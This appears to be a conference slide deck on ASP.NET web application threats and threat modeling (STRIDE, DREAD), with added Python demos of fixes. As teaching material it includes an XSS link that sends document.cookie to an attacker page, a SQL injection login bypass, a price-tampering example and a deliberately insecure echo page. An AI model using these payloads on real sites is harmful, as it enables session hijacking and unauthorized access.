DEV311: Building Secure Web Applications: Threats And Threat Modeling

Jeff Prosise, Co-founder, Wintellect (www.wintellect.com)

Why Security?

2002 Computer Crime and Security Survey (percentages of companies who participated in the survey):

| Finding | Companies |
|---|---|
| Reported security breaches in the last 12 months | 90% |
| Acknowledged financial losses as a result | 80% |
| Identified Internet connection as frequent source of attacks | 74% |
| Reported intrusions to authorities | 34% |

Call To Action

Secure software requires knowledgeable IT personnel
- Software isn't secure if the network is not
- Administration is the bedrock of security

Secure software also requires knowledgeable developers
- Proper administration is meaningless if the code you write isn't secure
- Most developers today don't know they're writing insecure code

This Is Insecure Code!

```aspx
<html>
  <body>
    <form runat="server">
      <asp:TextBox ID="Input" runat="server" />
      <asp:Button Text="Click Me" OnClick="OnSubmit" runat="server" />
      <asp:Label ID="Output" runat="server" />
    </form>
  </body>
</html>

<script language="C#" runat="server">
// Whatever the user typed is written back into the page unvalidated and
// unencoded; the cross-site scripting slides below show why that matters.
void OnSubmit (Object sender, EventArgs e)
{
    Output.Text = "Hello, " + Input.Text;
}
</script>
```

Threat Types

| Layer | Threats | Examples |
|---|---|---|
| Network | Threats against the network | Spoofed packets, etc. |
| Host | Threats against the host | Buffer overflows, illicit paths, etc. |
| Application | Threats against the application | SQL injection, XSS, input tampering, etc. |

Threats Against The Network

| Threat | Examples |
|---|---|
| Information gathering | Port scanning; using trace routing to detect network topologies; using broadcast requests to enumerate subnet hosts |
| Eavesdropping | Using packet sniffers to steal passwords |
| Denial of service (DoS) | SYN floods; ICMP echo request floods; malformed packets |
| Spoofing | Packets with spoofed source addresses |

Reference: http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh15.asp?frame=true#c15618429_004

Threats Against The Host

| Threat | Examples |
|---|---|
| Arbitrary code execution | Buffer overflows in ISAPI DLLs (e.g., MS01-033); directory traversal attacks (MS00-078) |
| File disclosure | Malformed HTR requests (MS01-031); virtualized UNC share vulnerability (MS00-019) |
| Denial of service (DoS) | Malformed SMTP requests (MS02-012); malformed WebDAV requests (MS01-016); malformed URLs (MS01-012); brute-force file uploads |
| Unauthorized access | Resources with insufficiently restrictive ACLs; spoofing with stolen login credentials |
| Exploitation of open ports and protocols | Using NetBIOS and SMB to enumerate hosts; connecting remotely to SQL Server |

Reference: http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh15.asp?frame=true#c15618429_004

Threats Against The Application

| Threat | Examples |
|---|---|
| SQL injection | Including DROP TABLE command in text typed into an input field |
| Cross-site scripting | Using malicious client-side script to steal cookies |
| Hidden-field tampering | Maliciously changing the value of a hidden field |
| Eavesdropping | Using a packet sniffer to steal passwords and cookies from traffic on unencrypted connections |
| Session hijacking | Using a stolen session ID cookie to access someone else's session state |
| Identity spoofing | Using a stolen forms authentication cookie to pose as another user |
| Information disclosure | Allowing client to see a stack trace when an unhandled exception occurs |

Reference: http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh15.asp?frame=true#c15618429_004

SQL Injection

Exploits applications that don't validate input used to form database commands
- Input from <form> fields
- Input from query strings

The technique
- Find a <form> field or query string parameter whose value is used in SQL queries
- Provide malicious input that modifies the nature of the query

How SQL Injection Works

Model query:

```sql
SELECT COUNT (*) FROM Users
WHERE UserName='Jeff'
AND Password='imbatman'
```

Malicious query:

```sql
SELECT COUNT (*) FROM Users
WHERE UserName='' or 1=1--'
AND Password=''
```

- "or 1=1" matches every record in the table
- "--" comments out the remainder of the query
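The two queries above, run for real against an in-memory SQLite table, as an added example that is not part of the deck: the concatenated form reproduces the slide's malicious query, and the same query with a bound parameter does not. The table, the single user row and the function names are constructed for this example.

```python
"""Added example (not from the DEV311 deck): the deck's login query built
two ways and fed both the honest input and the slide's injection input."""
import sqlite3

# Constructed sample data: the one user the slide's model query checks for.
# Plaintext passwords are kept only because the slide's query compares them.
USERS = [("Jeff", "imbatman")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserName TEXT, Password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)", USERS)
    return conn


def count_concat(conn: sqlite3.Connection, user: str, pwd: str) -> int:
    """Vulnerable: input is spliced into the SQL text, so a quote and '--'
    in the input become part of the statement (the slide's malicious query)."""
    sql = ("SELECT COUNT(*) FROM Users WHERE UserName='" + user
           + "' AND Password='" + pwd + "'")
    return conn.execute(sql).fetchone()[0]


def count_param(conn: sqlite3.Connection, user: str, pwd: str) -> int:
    """Hardened: the same query with bound parameters. The driver passes the
    input as data, so "' or 1=1--" is compared literally against UserName."""
    sql = "SELECT COUNT(*) FROM Users WHERE UserName=? AND Password=?"
    return conn.execute(sql, (user, pwd)).fetchone()[0]


def demo() -> dict:
    """Row counts for each (query style, input) pair."""
    conn = make_db()
    # The slide's input: closes the quote, adds a tautology, comments out the rest.
    injected_user = "' or 1=1--"
    return {
        "concat_honest": count_concat(conn, "Jeff", "imbatman"),
        "concat_injected": count_concat(conn, injected_user, ""),
        "param_honest": count_param(conn, "Jeff", "imbatman"),
        "param_injected": count_param(conn, injected_user, ""),
    }
```

With one row in the table, the injected input makes the concatenated query count that row (a "successful login" with no password), while the parameterized query counts nothing.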

SQL Injection

Cross-Site Scripting

Exploits applications that don't validate input echoed to the page
- Input from <form> fields
- Input from query strings

The technique
- Find a <form> field or query string parameter whose value is used as output
- Get a victim to click a link that injects malicious client-side script into the page

How Cross-Site Scripting Works

```html
<a href="http://…/Search.aspx?Search=<script language='javascript'>document.location.replace('http://localhost/EvilPage.aspx?Cookie=' + document.cookie);</script>">…</a>
```

- URL points to the site that the hacker wants to attack
- Query string contains embedded JavaScript that redirects to the hacker's page and transmits any cookies issued by Search.aspx in a query string
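The reflection bug behind both the "Hello, " + Input.Text sample and the Search.aspx link, beside the countermeasure the deck names later (HTML-encode output), as an added example that is not part of the deck. The payload is the slide's; example.com stands in for the site shown as http://…/, and the page template and function names are this example's.

```python
"""Added example (not from the DEV311 deck): reflecting a query-string value
into a page as-is versus HTML-encoding it first."""
import html
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# The slide's script payload, verbatim.
PAYLOAD = ("<script language='javascript'>document.location.replace("
           "'http://localhost/EvilPage.aspx?Cookie=' + document.cookie);</script>")

# The link a victim would be sent, URL-encoded the way a browser transmits it
# (example.com is a placeholder for the attacked site).
MALICIOUS_LINK = "http://example.com/Search.aspx?" + urlencode({"Search": PAYLOAD})

# Constructed stand-in for the Search.aspx results page.
PAGE = "<html><body><p>Results for: {term}</p></body></html>"
SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def search_term(url: str) -> str:
    """Recover the Search parameter exactly as the server-side handler sees it."""
    return parse_qs(urlsplit(url).query).get("Search", [""])[0]


def render_unsafe(term: str) -> str:
    """Vulnerable: the value is spliced in as markup, so the browser executes it."""
    return PAGE.format(term=term)


def render_encoded(term: str) -> str:
    """Hardened: <, >, &, ' and " become entities and the value displays as text."""
    return PAGE.format(term=html.escape(term, quote=True))


def has_live_script(page: str) -> bool:
    """Comparison aid for the two renderings: is a real <script> tag present?"""
    return SCRIPT_TAG.search(page) is not None


def demo() -> dict:
    """Does the payload survive the URL round trip, and which rendering runs it?"""
    term = search_term(MALICIOUS_LINK)
    return {
        "round_trips": term == PAYLOAD,
        "unsafe_runs_script": has_live_script(render_unsafe(term)),
        "encoded_runs_script": has_live_script(render_encoded(term)),
    }
```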

Cross-Site Scripting

Hidden-Field Tampering

Exploits apps that persist data between requests by round-tripping it in hidden <input> fields

The technique
- Look for <input type="hidden" … > tags
- Submit bogus requests with modified value attributes to spoof a Web server

How Hidden-Field Tampering Works

Page contains this…

```html
<input type="hidden" id="price" value="10000.00">
```

Postback data should contain this…

    price="10000.00"

Instead it contains this…

    price="1.00"
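One way to make the round-tripped price field above tamper-evident, as an added example that is not part of the deck: the server emits an HMAC over the field name and value alongside the field and refuses any postback whose tag does not verify, so price="1.00" sent with a tag issued for "10000.00" is rejected. The key handling, the companion `_sig` field and the function names are assumptions of this example; the deck itself only shows the attack.

```python
"""Added example (not from the DEV311 deck): signing a hidden field so the
server can detect a modified value on postback."""
import hashlib
import hmac
import secrets
from decimal import Decimal

# Constructed server-side secret for this example; a real application loads it
# from protected configuration and never sends it to the client.
SERVER_KEY = secrets.token_bytes(32)


def sign_field(name: str, value: str, key: bytes = SERVER_KEY) -> str:
    """Tag over name=value, so a tag cannot be moved to a different field."""
    return hmac.new(key, f"{name}={value}".encode(), hashlib.sha256).hexdigest()


def emit_hidden(name: str, value: str) -> str:
    """Render the hidden field plus its companion signature field."""
    return (f'<input type="hidden" id="{name}" value="{value}">'
            f'<input type="hidden" id="{name}_sig" value="{sign_field(name, value)}">')


def read_hidden(post: dict, name: str, key: bytes = SERVER_KEY) -> str:
    """Return the posted value only if its tag verifies (constant-time compare)."""
    value, sig = post.get(name, ""), post.get(f"{name}_sig", "")
    if not hmac.compare_digest(sign_field(name, value, key), sig):
        raise ValueError(f"hidden field {name!r} failed integrity check")
    return value


def checkout_total(post: dict) -> Decimal:
    """Server-side use of the field: only a verified price is ever parsed."""
    return Decimal(read_hidden(post, "price"))


def postback_accepted(post: dict) -> bool:
    try:
        checkout_total(post)
        return True
    except ValueError:
        return False


def honest_postback() -> dict:
    """What the browser sends back when the page is submitted untouched."""
    return {"price": "10000.00", "price_sig": sign_field("price", "10000.00")}


def tampered_postback() -> dict:
    """The slide's modified value; the tag still covers 10000.00."""
    post = honest_postback()
    post["price"] = "1.00"
    return post
```

The stronger fix is not to round-trip the price at all but to look it up server-side from the item ID on postback; signing is for values that genuinely must travel through the client.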

Hidden-Field Tampering

Session Hijacking

Web applications use session state
- Sessions are per-user state stores
- Sessions can be compromised

| Threat | Risk Factor |
|---|---|
| Theft and replay of session ID cookies | High |
| Links to sites that use cookieless session state | Medium |
| Predictable session IDs | Low |
| Remote connection to state server service | Medium |
| Remote connection to state server database | Medium |
| Eavesdropping on state server connection | Medium |

Identity Spoofing

Security depends on authentication
- If authentication can be compromised, security goes out the window
- Authentication can be compromised

| Threat | Risk Factor |
|---|---|
| Theft of Windows authentication credentials | High |
| Theft of forms authentication credentials | High |
| Theft and replay of authentication cookies | Medium |
| Dictionary attacks and password guessing | High |

Threat Modeling

Structured approach to identifying, quantifying, and addressing threats

Essential part of development process
- Just like specing and designing
- Just like coding and testing

One technique presented here
- There are others (e.g., OCTAVE)

Threat Modeling Process

1. Identify assets
2. Document architecture
3. Decompose application
4. Identify threats
5. Document threats
6. Rate threats

Identifying Assets (step 1)

What is it that you want to protect?
- Private data (e.g., customer list)
- Proprietary data (e.g., IP)
- Potentially injurious data (e.g., credit card numbers, decryption keys)

These also count as "assets"
- Integrity of back-end databases
- Integrity of the Web pages
- Integrity of other servers
- Availability of the application

Document Architecture (step 2)

Define what the application does and how it's used
- Users view pages with catalog items
- Users perform searches for catalog items
- Users add items to shopping carts
- Users check out

Diagram the application
- Show subsystems
- Show data flow
- List assets

Example

[Architecture diagram: users Bob, Alice and Bill; two firewalls; a Web Server running IIS and ASP.NET with Login, State and Main pages; a Database Server; Assets #1 to #6 marked on the components.]

Decomposing The App (step 3)

Refine the architecture diagram
- Show authentication mechanisms
- Show authorization mechanisms
- Show technologies (e.g., DPAPI)
- Diagram trust boundaries
- Identify entry points

Begin to think like an attacker
- Where are my vulnerabilities?
- What am I going to do about them?

Example

[Refined architecture diagram: the same users (Bob, Alice, Bill), firewalls, Web Server (IIS, ASP.NET; Login, State, Main) and Database Server, now annotated with Forms Authentication and URL Authorization on the Web Server, DPAPI, Windows Authentication to the Database Server, and a trust boundary.]

Identifying Threats (step 4)

Method #1: Threat lists
- Start with laundry list of possible threats
- Identify the threats that apply to your application

Method #2: STRIDE
- Categorized list of threat types
- Identify threats by type/category

Optionally draw threat trees
- Root nodes represent attacker's goals
- Trees help identify threat conditions

STRIDE

| | Threat type | Question to ask |
|---|---|---|
| S | Spoofing | Can an attacker gain access using a false identity? |
| T | Tampering | Can an attacker modify data as it flows through the application? |
| R | Repudiation | If an attacker denies an exploit, can you prove him or her wrong? |
| I | Information disclosure | Can an attacker gain access to private or potentially injurious data? |
| D | Denial of service | Can an attacker crash or reduce the availability of the system? |
| E | Elevation of privilege | Can an attacker assume the identity of a privileged user? |

Threat Trees

```text
Theft of Auth Cookies
(Obtain auth cookie to spoof identity)
|
OR
|-- AND
|   |-- Unencrypted Connection  (Cookies travel over unencrypted HTTP)
|   `-- Eavesdropping           (Attacker uses sniffer to monitor HTTP traffic)
`-- AND
    |-- Cross-Site Scripting    (Attacker possesses means and knowledge)
    `-- XSS Vulnerability       (Application is vulnerable to XSS attacks)
```

Documenting Threats (step 5)

Document threats using a template

Theft of Auth Cookies by Eavesdropping on Connection

| Threat target | Connections between browsers and Web server |
|---|---|
| Risk | |
| Attack techniques | Attacker uses sniffer to monitor traffic |
| Countermeasures | Use SSL/TLS to encrypt traffic |

Theft of Auth Cookies via Cross-Site Scripting

| Threat target | Vulnerable application code |
|---|---|
| Risk | |
| Attack techniques | Attacker sends e-mail with malicious link to users |
| Countermeasures | Validate input; HTML-encode output |

Rating Threats (step 6)

Simple model
- Risk = Probability * Damage Potential
- Probability: 1-10 scale (1 = Least probable, 10 = Most probable)
- Damage potential: 1-10 scale (1 = Least damage, 10 = Most damage)

DREAD model
- Finer-grained view of threat potential
- Rates each threat on scale of 1 to 15
- Widely used within Microsoft

DREAD

| | Dimension | Question to ask |
|---|---|---|
| D | Damage potential | What are the consequences of a successful exploit? |
| R | Reproducibility | Would an exploit work every time or only under certain circumstances? |
| E | Exploitability | How skilled must an attacker be to exploit the vulnerability? |
| A | Affected users | How many users would be affected by a successful exploit? |
| D | Discoverability | How likely is it that an attacker will know the vulnerability exists? |

DREAD

| | High (3) | Medium (2) | Low (1) |
|---|---|---|---|
| Damage potential | Attacker can retrieve extremely sensitive data and corrupt or destroy data | Attacker can retrieve sensitive data but do little else | Attacker can only retrieve data that has little or no potential for harm |
| Reproducibility | Works every time; does not require a timing window | Timing-dependent; works only within a time window | Rarely works |
| Exploitability | Bart Simpson could do it | Attacker must be somewhat knowledgeable and skilled | Attacker must be VERY knowledgeable and skilled |
| Affected users | Most or all users | Some users | Few if any users |
| Discoverability | Attacker can easily discover the vulnerability | Attacker might discover the vulnerability | Attacker will have to dig to discover the vulnerability |

Example

| Threat | D | R | E | A | D | Sum |
|---|---|---|---|---|---|---|
| Auth cookie theft (eavesdropping) | 3 | 2 | 3 | 2 | 3 | 13 |
| Auth cookie theft (XSS) | 3 | 2 | 2 | 2 | 3 | 12 |

How the columns were scored:
- Damage potential: potential for damage is high (spoofed identities, etc.)
- Reproducibility: cookie can be stolen any time, but is only useful until expired
- Exploitability: anybody can run a packet sniffer; XSS attacks require moderate skill
- Affected users: all users could be affected, but in reality most won't click malicious links
- Discoverability: easy to discover: just type a <script> block into a field

The Sum column gives the prioritized risks.
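The deck's two rating models as code, checked against the worked example above, as an added example that is not part of the deck: the simple model multiplies probability by damage potential on 1-10 scales, and the DREAD model scores each of D, R, E, A, D as High/Medium/Low (3/2/1) and sums them. The threats and their ratings are the slide's; the class and function names are this example's.

```python
"""Added example (not from the DEV311 deck): the simple and DREAD threat-rating
models, with label validation and prioritization by total."""
from dataclasses import astuple, dataclass

SCORE = {"High": 3, "Medium": 2, "Low": 1}


def simple_risk(probability: int, damage: int) -> int:
    """Deck's simple model: Risk = Probability * Damage Potential, both 1-10."""
    for v in (probability, damage):
        if not 1 <= v <= 10:
            raise ValueError("simple-model inputs are on a 1-10 scale")
    return probability * damage


@dataclass(frozen=True)
class Dread:
    threat: str
    damage: str           # Damage potential
    reproducibility: str
    exploitability: str
    affected_users: str
    discoverability: str

    def scores(self) -> tuple:
        """Map each High/Medium/Low label to 3/2/1, rejecting anything else."""
        labels = astuple(self)[1:]
        try:
            return tuple(SCORE[label] for label in labels)
        except KeyError as e:
            raise ValueError(f"unknown DREAD rating {e}") from None

    def total(self) -> int:
        """Sum of the five dimensions (the deck's 1-to-15 scale)."""
        return sum(self.scores())


def prioritize(threats: list) -> list:
    """Order threats by DREAD total, highest first; stable for ties."""
    return sorted(threats, key=lambda t: t.total(), reverse=True)


# The slide's example rows, deliberately entered in the wrong order.
EXAMPLE = [
    Dread("Auth cookie theft (XSS)", "High", "Medium", "Medium", "Medium", "High"),
    Dread("Auth cookie theft (eavesdropping)", "High", "Medium", "High", "Medium", "High"),
]


def example_table() -> list:
    """(threat, D, R, E, A, D, sum) rows in priority order, as on the slide."""
    return [(t.threat, *t.scores(), t.total()) for t in prioritize(EXAMPLE)]
```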

Microsoft Products And Services For Lifelong Learning (www.microsoft.com/learning)

Assessments: www.microsoft.com/assessment

Courses
- 2310: Developing Microsoft ASP .NET Web Applications Using Visual Studio .NET
- 2640: Upgrading Web Development Skills from ASP to Microsoft ASP .NET
- 1905: Building XML-Based Web Applications
- 2311: Advanced ASP.NET (scheduled release July 04)

Books
- Designing ASP .NET Applications, ISBN: 0-7356-1348-6
- Programming Microsoft ASP .NET, ISBN: 0-7356-1903-4
- Microsoft ASP .NET Coding Strategies with the Microsoft ASP .NET Team, ISBN: 0-7356-1900-X
- Developing Microsoft ASP.NET Server Controls and Components, ISBN: 0-7356-1582-9
- Building Secure Microsoft ASP .NET Applications, ISBN: 0-7356-1890-9
- Building Microsoft ASP .NET Applications for Mobile Devices (Second Edition), ISBN: 0-7356-1914-X
- MCAD/MCSD Self-Paced Training Kit: Developing Web Applications with Microsoft Visual Basic .NET and Microsoft Visual C# .NET (Second Edition), ISBN: 0-7356-1927-1

DEV311: Building Secure Web Applications: Threats And Threat Modeling

Jeff Prosise, Co-founder, Wintellect (www.wintellect.com)